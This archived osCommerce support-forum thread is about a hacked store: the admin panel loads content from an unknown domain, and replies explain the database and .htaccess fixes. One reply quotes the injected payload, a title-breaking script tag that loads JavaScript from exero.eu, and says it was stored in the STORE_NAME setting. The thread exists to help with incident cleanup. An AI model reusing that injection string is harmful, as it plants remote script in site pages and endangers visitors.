Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

maybe hacked


henry67

Recommended Posts

Hi,

 

Any help would be greatly appreciated.

 

When I sign into my admin panel, I get a hader but no "boxes" with the orders/customers/etc.

 

At the bottom is says: waiting for www.exero.eu/catalog/css.htm...

 

BUT my webiste is dogsuppliessite.com - not exero.eu - do not know who this is.

 

I think I have been hacked - can anyone help me to get this fixed. I am not a programmer - need to hire someone to fix please.

 

Thanks

Link to comment
Share on other sites

Jill,

 

 

It sounds like you have been hacked, by a stupid hacker ! The whole idea of redirecting is to send your customers to another website to bring the hit count up, the stupid hacker that got you, would only be sending YOU to the other site. (only giving him 1 unique hit)

 

 

There are many members who offer professional services on this website, check the 'about me' pages found in members signatures for more information.

 

 

 

 

 

Chris

Link to comment
Share on other sites

Jill,

 

My website got hacked too.

 

Somehow, the hacker got into my system and added the text "</title><script src=http://exero.eu/catalog/jquery.js></script>" to the end of my store's name. The value is stored in your database for the key STORE_NAME. So where ever STORE_NAME is displayed (for example, pageHeading), the extraneous script will be executed ... bummers.

 

To remove the extraneous text, get into your database (I use phpMyAdmin) and edit the row in the "configuration" table whose configuration_key value is 'STORE_NAME'. The extraneous text is in the configuration_value field.

 

Hope this helps.

I'll be upgrading to the latest OSCommerce release soon, hoping that will hold off these hackers.

 

Al

Link to comment
Share on other sites

i had same problem but i have solved it by debug each and every page... starting from application_top.

 

i'd echo one statement and stop executing other code by exit(); function right after echo statement.

 

i'd found that my code is correct but my .htaccess file is hacked and it redirect my site to other site so i deleted .htaccess file..

 

and after some time i create new .htaccess file and upload in server now its working fine...

 

also sometime there is miscellaneous code like any ascii value #980 #231 something like that.... send your header to redirect in another site.

 

check for that.... if your any page contain miscellaneous code or .htaccess is hacked..

Please take backup of your files before do changes suggested by me

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...